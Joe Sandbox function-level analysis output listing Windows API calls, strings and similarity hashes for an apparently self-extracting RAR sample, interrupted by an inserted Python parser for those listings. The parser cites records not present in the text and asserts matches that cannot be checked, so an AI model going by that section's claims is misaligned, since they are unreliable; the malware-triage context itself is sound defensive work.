                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 1d06441947a5740bdb35b0af5b434047fbc94496205dab9651328ffc9ba46737
                                                                                              • Instruction ID: df714dd980214b72ab3dac5c6fb0a8b480cb6776d68ab1c333c95eed8300838d
                                                                                              • Opcode Fuzzy Hash: 1d06441947a5740bdb35b0af5b434047fbc94496205dab9651328ffc9ba46737
                                                                                              • Instruction Fuzzy Hash: 372122721493107FE225BB35DC4AFEF339CAF89B00F005225FA89B61D1DB30890987A5
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00E8FF25
                                                                                                • Part of subcall function 00E903D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?), ref: 00E903EA
                                                                                                • Part of subcall function 00E903D4: GetLastError.KERNEL32(?,?,00E93546,?,00000000,?,00000000,?,00E9356D,?,00000007,?,?,00E9396A,?,?), ref: 00E903FC
                                                                                              • _free.LIBCMT ref: 00E8FF31
                                                                                              • _free.LIBCMT ref: 00E8FF3C
                                                                                              • _free.LIBCMT ref: 00E8FF47
                                                                                              • _free.LIBCMT ref: 00E8FF52
                                                                                              • _free.LIBCMT ref: 00E8FF5D
                                                                                              • _free.LIBCMT ref: 00E8FF68
                                                                                              • _free.LIBCMT ref: 00E8FF73
                                                                                              • _free.LIBCMT ref: 00E8FF7E
                                                                                              • _free.LIBCMT ref: 00E8FF8C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: f2db54f2dfa6bacf9124bd0bfc3a21c23abb3faf2b8feeaeeb3d5945d128d84e
                                                                                              • Instruction ID: 490165d034f755a46d25c7d7052d90be860d491bc130bea9aa15b49f28313b48
                                                                                              • Opcode Fuzzy Hash: f2db54f2dfa6bacf9124bd0bfc3a21c23abb3faf2b8feeaeeb3d5945d128d84e
                                                                                              • Instruction Fuzzy Hash: 2911727651424CBFCF01EF94CD42CDD3BA9EF08350B9161A5FA08AB262DA71EA50DB80
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: f0015979ede9efc66ca92f9000a0e4346a2fdd852df4cb2197367100452fa6ce
                                                                                              • Instruction ID: d607bb4e494a0aca327c3e211f901fb552e375b9a7d03334b0acc16d7ba25fec
                                                                                              • Opcode Fuzzy Hash: f0015979ede9efc66ca92f9000a0e4346a2fdd852df4cb2197367100452fa6ce
                                                                                              • Instruction Fuzzy Hash: 6AB16435C00209EFCF19EFA4D9819BEBBB5AF04318B18646AE80D7B253D731DA51CB95
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6D99A
                                                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00E6D9BF
                                                                                              • GetLongPathNameW.KERNEL32(?,?,?), ref: 00E6DA11
                                                                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00E6DA34
                                                                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 00E6DA84
                                                                                              • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00E6DC9F
                                                                                              • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00E6DCEC
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                                                                              • String ID: rtmp
                                                                                              • API String ID: 2388273531-870060881
                                                                                              • Opcode ID: 5e4f3f20359e797f9eb303a3c02cef3a412a35efc5ad8066996b115947127d46
                                                                                              • Instruction ID: 11a5a24c6025ce3437f9f8c4c15696bff918a63e333840bb8f114e90c72e70df
                                                                                              • Opcode Fuzzy Hash: 5e4f3f20359e797f9eb303a3c02cef3a412a35efc5ad8066996b115947127d46
                                                                                              • Instruction Fuzzy Hash: 65B15670E44258DACF21EFA4EC85BDDBBB8AF14384F845199E009B7251DB309B89CF60
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3__wcslen
                                                                                              • String ID: .rar$exe$rar$sfx
                                                                                              • API String ID: 3251556500-630704357
                                                                                              • Opcode ID: 480075c7fa87eaeb902f8c5a8f5615fea100a02661cf13ff2735c45bde8176c8
                                                                                              • Instruction ID: 7c5abe2e38eed48f967302eff1b5e0d5123d96a332b64edcba775ca255f85d09
                                                                                              • Opcode Fuzzy Hash: 480075c7fa87eaeb902f8c5a8f5615fea100a02661cf13ff2735c45bde8176c8
                                                                                              • Instruction Fuzzy Hash: 0371E230B007109BCF25EFA8C941AADB7F4EF48B50F24A55EF589BB291DB719942C760
                                                                                              APIs
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E80720
                                                                                              • SendMessageW.USER32(?,00000080,00000001,0001042F), ref: 00E80747
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,0F050EA2), ref: 00E80760
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00E8077C
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00E80790
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00E807A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$DialogTextWindow
                                                                                              • String ID: LICENSEDLG$J
                                                                                              • API String ID: 3077722735-3331784582
                                                                                              • Opcode ID: 1cb009230b1a1f105fd0d4e8d866d9896a4808e8e6e45d98c7f968a805b12963
                                                                                              • Instruction ID: 14a32b14484c72df430e10a07e13eb19e5c2151712c61e0e7923049c4041b05c
                                                                                              • Opcode Fuzzy Hash: 1cb009230b1a1f105fd0d4e8d866d9896a4808e8e6e45d98c7f968a805b12963
                                                                                              • Instruction Fuzzy Hash: 12210531245204BFD2527F369D4CE6B3BACEB8A785F001116F649B65A1C663A9088B31
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00E7F1F5
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00E7F224
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00E7F2BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                               • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease
                                                                                              • String ID: )K$DK$NK$lK$vK
                                                                                              • API String ID: 1429681911-958383546
                                                                                              • Opcode ID: 6a73787bc344b9a3bd2ba11e96b2289dce661a0cd28909331fbc39eebf895592
                                                                                              • Instruction ID: 48bbd65db53dcbece78da6cced67c9387c19ff2d465e2e6f2da3c77f93d9f801
                                                                                              • Opcode Fuzzy Hash: 6a73787bc344b9a3bd2ba11e96b2289dce661a0cd28909331fbc39eebf895592
                                                                                              • Instruction Fuzzy Hash: 6821ED7210C304EFD7016FA2DC48E6BBFE9FB89351F040619FA85A2621D63199599B62
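Worked example, added here and not part of the Joe Sandbox report or its tooling: a small Python parser for the per-function "APIs" listings above. It reads the bullet lines, keeps the "Part of subcall function" entries as callee calls, pulls out the arguments the sandbox resolved to readable strings (the "<html>" and "exe" literals buried among the pointers), and rebuilds the Similarity "API ID" key. The rebuild rule is inferred from the listings on this page rather than taken from any Joe Sandbox documentation: each API name is split at capital letters, tokens shorter than four characters (Get, Set, Rtl, Dlg, DC, the W suffix) are dropped, tokens are counted across direct and subcall lines, grouped by descending count with "$" between groups, and ordered by code point within a group. The two sample listings are copied from the HTML-stream builder and window-walker records above; the minimum token length is an assumption.

```python
import re
from collections import Counter, defaultdict

# Constructed input: two "APIs" listings copied from function records in this
# report (the HTML-stream builder at 00E7D919 and the window walker at 00E837C4).
# Indented "Part of subcall function" lines belong to a callee but still count
# towards the caller's API ID.
HTML_STREAM = r"""
• __EH_prolog3_GS.LIBCMT ref: 00E7D919
  • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
• _wcslen.LIBCMT ref: 00E7D97B
• _wcslen.LIBCMT ref: 00E7D99A
• _wcslen.LIBCMT ref: 00E7D9B6
• _strlen.LIBCMT ref: 00E7DA14
• GlobalAlloc.KERNEL32(00000040,?,00000000,00E9D9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00E7DA2D
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00E7DA54
"""
WINDOW_WALKER = r"""
• GetWindow.USER32(?,00000005), ref: 00E837C4
• GetClassNameW.USER32(00000000,?,00000080), ref: 00E837F0
  • Part of subcall function 00E78DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00E70E3F,?,?,?,00000046,00E71ECE,00000046,?,exe,00000046), ref: 00E78DBA
• GetWindowLongW.USER32(00000000,000000F0), ref: 00E8380C
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E83823
• GetObjectW.GDI32(00000000,00000018,?), ref: 00E83837
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E83860
• DeleteObject.GDI32(00000000), ref: 00E83867
• GetWindow.USER32(00000000,00000002), ref: 00E83870
"""

# One listing line: optional subcall prefix, Name.MODULE, optional (args), ref: address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-F]{8}$")        # raw pointer/integer argument
TOKEN = re.compile(r"[A-Z][^A-Z]*|^[^A-Z]+")    # split at capitals; a leading _name stays whole
MIN_TOKEN_LEN = 4  # assumption inferred from this page: Get/Set/Rtl/Dlg/DC/On/W never reach an API ID


def parse_api_lines(listing):
    """Turn one function's APIs listing into a list of call records, in report order."""
    calls = []
    for line in listing.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # blank lines or headings such as "APIs"/"Strings"
        # Arguments are split on commas; a literal that itself contains a comma would be split too.
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append({"name": m["name"], "module": m["module"], "args": args,
                      "ref": m["ref"], "subcall_of": m["caller"]})
    return calls


def name_tokens(name):
    """'SendDlgItemMessageW' -> ['Send', 'Item', 'Message']; '__EH_prolog3_GS' -> ['H_prolog3_']."""
    return [t for t in TOKEN.findall(name) if len(t) >= MIN_TOKEN_LEN]


def api_id(calls):
    """Rebuild the Similarity 'API ID': token groups by descending count joined with '$',
    tokens inside a group in code-point order (uppercase letters sort before '_')."""
    counts = Counter(t for c in calls for t in name_tokens(c["name"]))
    by_count = defaultdict(list)
    for tok, n in counts.items():
        by_count[n].append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def literal_args(calls):
    """(api, argument) pairs the sandbox resolved to readable strings: the triage leads
    such as '<html>' or 'exe' hidden among the pointers and integers."""
    return [(c["name"], a) for c in calls for a in c["args"]
            if a and a != "?" and not HEX_ARG.match(a)]


if __name__ == "__main__":
    for label, listing in (("HTML stream", HTML_STREAM), ("window walker", WINDOW_WALKER)):
        calls = parse_api_lines(listing)
        print(f"{label}: {len(calls)} calls, API ID = {api_id(calls)}")
        for api, arg in literal_args(calls):
            print(f"  {api}: {arg!r}")
```

Run against the two listings, the rebuilt keys equal the API IDs the report prints for those records, which is what makes the key useful for clustering: two functions with the same API ID share the same multiset of call-name tokens regardless of addresses or argument values. The String ID is not reconstructed here because the ordering of its "$"-separated strings is not consistent across the records on this page.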
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00E704AB,00E704AD,00000000,00000000,522FB702,00000001,00000000,00000000,?,00E7038C,?,00000004,00E704AB,ROOT\CIMV2), ref: 00E85459
• MultiByteToWideChar.KERNEL32(00000000,00000000,00E704AB,?,00000000,00000000,?,?,00E7038C,?,00000004,00E704AB), ref: 00E854D4
• SysAllocString.OLEAUT32(00000000), ref: 00E854DF
• _com_issue_error.COMSUPP ref: 00E85508
• _com_issue_error.COMSUPP ref: 00E85512
• GetLastError.KERNEL32(80070057,522FB702,00000001,00000000,00000000,?,00E7038C,?,00000004,00E704AB,ROOT\CIMV2), ref: 00E85517
• _com_issue_error.COMSUPP ref: 00E8552A
• GetLastError.KERNEL32(00000000,?,00E7038C,?,00000004,00E704AB,ROOT\CIMV2), ref: 00E85540
• _com_issue_error.COMSUPP ref: 00E85553
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
• String ID:
• API String ID: 1353541977-0
• Opcode ID: 94b988b33360e7b7a09dca0d06eb981884c66bc56b23431a6c3be1e895c36e3f
• Instruction ID: 200c5500e4143eb68550d5fe64d255a337808c6a1b543eae688135f14a7e76d4
• Opcode Fuzzy Hash: 94b988b33360e7b7a09dca0d06eb981884c66bc56b23431a6c3be1e895c36e3f
• Instruction Fuzzy Hash: A041F872A00704EFCB10BFA9DC45BAEB7E9EB48714F10522AF51DF7291DB7498408BA5
APIs
• __EH_prolog3.LIBCMT ref: 00E70470
  • Part of subcall function 00E70360: __EH_prolog3.LIBCMT ref: 00E70367
• VariantClear.OLEAUT32(?), ref: 00E705FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3$ClearVariant
• String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
• API String ID: 4196654922-3505469590
• Opcode ID: a10d321b0b15d728490999ceccfb23ada98fb2e23210bc27a5e07c21d73880aa
• Instruction ID: 3a2493abb38fe5447bb1aa960d4d1e01332f09e03699c703aee67777db0ea4ce
• Opcode Fuzzy Hash: a10d321b0b15d728490999ceccfb23ada98fb2e23210bc27a5e07c21d73880aa
• Instruction Fuzzy Hash: 84617B71A00619EFDB14EFA4CC94AAEB7B8FF48314B14555DF51AB72A0DB30AD01CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: H_prolog3_wcslen
• String ID: $</p>$</style>$<br>$<style>
• API String ID: 3746244732-3393513139
• Opcode ID: eddd3a8a0400240e438732cc0a0f13901409595b9d338114ade868d01a8627cd
• Instruction ID: e16452ad5244390c0c4e9bb951c69d7bdd4df4accfa60b697cc3b0db48c057ff
• Opcode Fuzzy Hash: eddd3a8a0400240e438732cc0a0f13901409595b9d338114ade868d01a8627cd
• Instruction Fuzzy Hash: C7513935B4131396DF309A14881277673B5AF6C749F98E099F98DBB3C1EB758D818390
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E7E26C
• ShowWindow.USER32(?,00000000,00000038), ref: 00E7E294
• GetWindowRect.USER32(?,?), ref: 00E7E2D8
• ShowWindow.USER32(?,00000005,?,00000000), ref: 00E7E373
• ShowWindow.USER32(00000000,00000005), ref: 00E7E394
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: Window$Show$H_prolog3_Rect
• String ID: RarHtmlClassName$gI
• API String ID: 950582801-2210054581
• Opcode ID: 1b3d7fb034ade3adcb38522f09976b091b691f6769cc9df19b3d189d42ce9ec3
• Instruction ID: f318afc60a00b5c37dbfb59d9edcaf7446f0f81894c42fbe2922a51b953b621a
• Opcode Fuzzy Hash: 1b3d7fb034ade3adcb38522f09976b091b691f6769cc9df19b3d189d42ce9ec3
• Instruction Fuzzy Hash: 42417D71901204EFDF11DFA8DD89AAE7BB9EF48300F049195F948BB261DB309D45CB60
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E84DDA,00E84D3D,00E84FDE), ref: 00E84D76
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E84D8C
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E84DA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive$p]
• API String ID: 667068680-2293571084
• Opcode ID: 0f0c7b73d556a4eae9c3a77e54febab5403cd4d3c36a3e0994ac751219c43bc1
• Instruction ID: bfee8a4a4fe5d13cda988e1bbcde52767f1add5eb4b68322b3f0e2fde6d96879
• Opcode Fuzzy Hash: 0f0c7b73d556a4eae9c3a77e54febab5403cd4d3c36a3e0994ac751219c43bc1
• Instruction Fuzzy Hash: 10F0AFB2601A23EB4B62BE755C857A72298EB85719710263ADB0DF22C0E6108C154791
APIs
• __aulldiv.LIBCMT ref: 00E7783D
  • Part of subcall function 00E7067E: GetVersionExW.KERNEL32(?), ref: 00E706AF
• FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00E77860
• FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00E77872
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00E77883
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00E77893
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00E778A3
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00E778DE
• __aullrem.LIBCMT ref: 00E77984
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
• Opcode ID: 5b21c5619ece7d3126f6b05fb645a1281578cb6221e63a177ca838da070ff760
• Instruction ID: 77b8075a46faacd0c98568728f442660364518f73ce3f03314cd0ba5c173ce4e
• Opcode Fuzzy Hash: 5b21c5619ece7d3126f6b05fb645a1281578cb6221e63a177ca838da070ff760
• Instruction Fuzzy Hash: 355115B15083059FD710DF65C88496BBBF9FB88714F108A2EF5DAE2211E734E948CB62
APIs
• GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00E82B66
  • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
  • Part of subcall function 00E70BF3: _wcslen.LIBCMT ref: 00E70C03
• EndDialog.USER32(?,00000001), ref: 00E82EDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: _wcslen$DialogPathTemp
• String ID: $@set:user$\S$\S
• API String ID: 2172748170-2420096344
• Opcode ID: 32a22cb057d6be8f8fe87d09cc58242a14e9282eca9257a651c9dd8094725564
• Instruction ID: 39753aad4975407e030213efbfbbce2f81a74ab9b80f78b52735981dc01b4987
• Opcode Fuzzy Hash: 32a22cb057d6be8f8fe87d09cc58242a14e9282eca9257a651c9dd8094725564
